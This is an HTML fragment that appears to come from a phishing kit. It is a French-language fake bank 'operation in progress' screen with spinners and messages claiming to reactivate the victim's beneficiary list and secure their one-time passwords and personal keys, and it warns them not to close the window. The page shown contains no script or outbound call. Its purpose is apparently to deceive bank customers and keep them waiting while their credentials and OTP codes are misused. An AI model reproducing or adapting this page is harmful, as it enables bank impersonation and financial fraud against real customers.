<input type="hidden" id="DivName" Value="Loading">
<style>
        .MLG8KIT{
            background-color: white;
            padding: 0px;
        }
        .myButton {
            background-color:#4170a9;
            border:1px solid #4170a9;
            display:inline-block;
            color:#ffffff;
            font-family:Arial;
            font-size:13px;
            font-weight:bold;
            padding:3px 14px;
            text-decoration:none;
        }
        input {
             padding: 0px;
             font-size: 14px;
             border-width: 0px;
             border-color: #CCCCCC;
             background-color: #FFFFFF;
             color: #5f5e5e;
             border-style: solid;
             border-radius: 0px;
             box-shadow: 0px 0px 2px rgba(66,66,66,.75);
             text-shadow: 0px 0px 0px rgba(255,255,255,.0);
        }
        
        
        
        
        </style>
        <!--
                905 * 386 / 280 * 386
        -->
        <div class="row">
                <div class="col-sm-12 col-xm-12 col-xs-12">
                 <img src="imgs/vos_bn.png" alt="">        
                </div>
         </div>
        <div class="row">
                <!--  <div class="col-md-3 col-xm-3 col-xs-3">
                       <img src="imgs/body_left.png" alt=""> 
                 </div>
                 
                 <div class="col-md-0.1">
                        <img src="imgs/lg_far9.png" alt=""> 
                 </div> -->
                 
                 <div class="col_lg_8 col-md-8 col-xm-8 col-xs-8 MLG8KIT">
                        <div class="panel panel-primary">
                                <div class="panel-heading"><h6><img src="imgs/vr.png" class="img-fluid" style="max-width:100%; height: auto;"></h6></div>
                                <div class="panel-body">
                        <div style="padding-top: 30px;"></div>
                        <!--<center>
                            <div style="height: 150px; width: 300px; background-color :#4170a9;">
                                <br>
                                    <img src="imgs/loading_info1.png" alt=""><br>
                                    <img src="imgs/spin.gif" width="50" height="50" alt=""><br>
                                    <img src="imgs/loading_info2.png" alt="">
                            </div>
                        </center>-->
                        <center>
                            <div style="height: 200px; width: 480px; background-color :#4170a9;">
                                    
                                <br>
                                <img src="imgs/spin.gif" width="20" height="20" alt=""> <font color='white'><strong>    IMPORTANT: Ne fermez pas cette fenêtre avant la fin de l'operation</strong></font> <br>
                                <div style="padding-top: 30px;"></div>
                                <img src="imgs/done.png" width="15" height="15" alt=""> <font color='white'>Réactiver votre liste des bénéficiaires</font> <br>
                                <img src="imgs/spin.gif" width="15" height="15" alt=""> <font color='white'>Securisé votre service (OTP - One Time Password)</font> <br>
                                <img src="imgs/spin.gif" width="15" height="15" alt=""> <font color='white'> Securisé votre service (SAF - clés personnelles)</font> <br>
                                
                                
                            </div>
                        </center>
                        
                        <div style="padding-top: 30px;"></div>
                </div>
        </div>
                 </div></div>
                </div>
                <div style="padding-top: 30px;"></div>
        <div class="row">
                <div class="col-sm-12 col-xm-12 col-xs-12">
                 <img src="#" alt="">
                </div>
        </div>
        